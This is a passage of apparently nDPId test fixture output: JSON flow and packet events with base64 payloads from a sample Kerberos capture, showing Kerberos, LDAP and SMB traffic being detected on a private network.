+02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wg
pM028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"} +00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVCf6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAINAAIAGkGmsEAjJrBAICMAUAYWVZlyUeqXAF1AYAQAMZQAAADzwgZ4odBCJHRYlGGakwQrZbcEXWu9XXnYRAfBS9UWuXk5Gs8yUHN3o80HZG8YpVlAE6+3ZtDtC+pUsrywDAW4RiWhUhsRgT1sEZ7Vtb++mdY4XtnskLm1\/a8GZzwfpptF0EbEM2x6OOlhhC6IhVJD1Y8p9M\/8ToLfUByDVk8u4C3VF8fyeQ0nd00U5YKsyBV8n8IUXdemUN+fgHev0R3Z+H9FwOZZ3xgduPU1Vapfbai\/N6Y9ZMkNd8RzvF1IldwQMemLuz0F0TTbyd784T8orT0ooc+nzAjFSSfg1FeelCx\/Q2\/iHKtSIZWhWBK\/UpxM="} 
+00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAACwE3FAAIAGfeWsEAgIrBAIyQBYwBWLIyaf550WwVAYAQCWAgAAAAAAhH6BgTB\/oAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OVqlBQIDDJwypgMCAQ2pEBsOSEFQUFlDUkFGVC5PUkeqJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6wZBBcwFaEDAgEDog4EDLsAAMAAAAAAAwAAAA=="} +00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAAD6E3RAAIAGfZisEAgIrBAIyQGFwBR6pcAXlWZdhlAYAQAZvwAAMIQAAADMAgEHYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG3yZsLFskNz2Tj8maOz7vLNMVSC3wBerc1xRFPj0GLDPGT9QlZRJav62bndhsIjLkgXNAdSqCa2GR8Luxe5TgJHZoIn44Is8Ku3wpqAc9pR3m8qLfoA6VkyZzzulSM2YJ4KniKJ4c7+rlJkc3DH"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931218,"flow_last_seen":1549337931218,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337931218,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1549337931218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337931218,"pkt":"pB9ywglqAAgCHEeuCABFAACxAI5AAIAGkMesEAjJrBAICMAXAFhuRvAsCoQzw1AYAQDQpAAAiAqFUHJzV5J+NXZTIhoIU8GbmBSxYcQbV4PW+ckPMTgFBw0KsYU9otlYXn6Tyj5\/BmOv8b2TCLvhZTzW6Z3PoLeUqFO88\/fWi+AgP8mYvV1NNCnNorn77cmRI2eXkDk7qLKlgMm4cUN+eWFUE7G2Z1e9ZdF2LM4CSirBRuN96IFr6Z0blZRnqpw="} +00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJ
MRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"} +00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
+02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8x
KOZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="} +00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="} +00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937690,"flow_last_seen":1549337937690,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937690,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 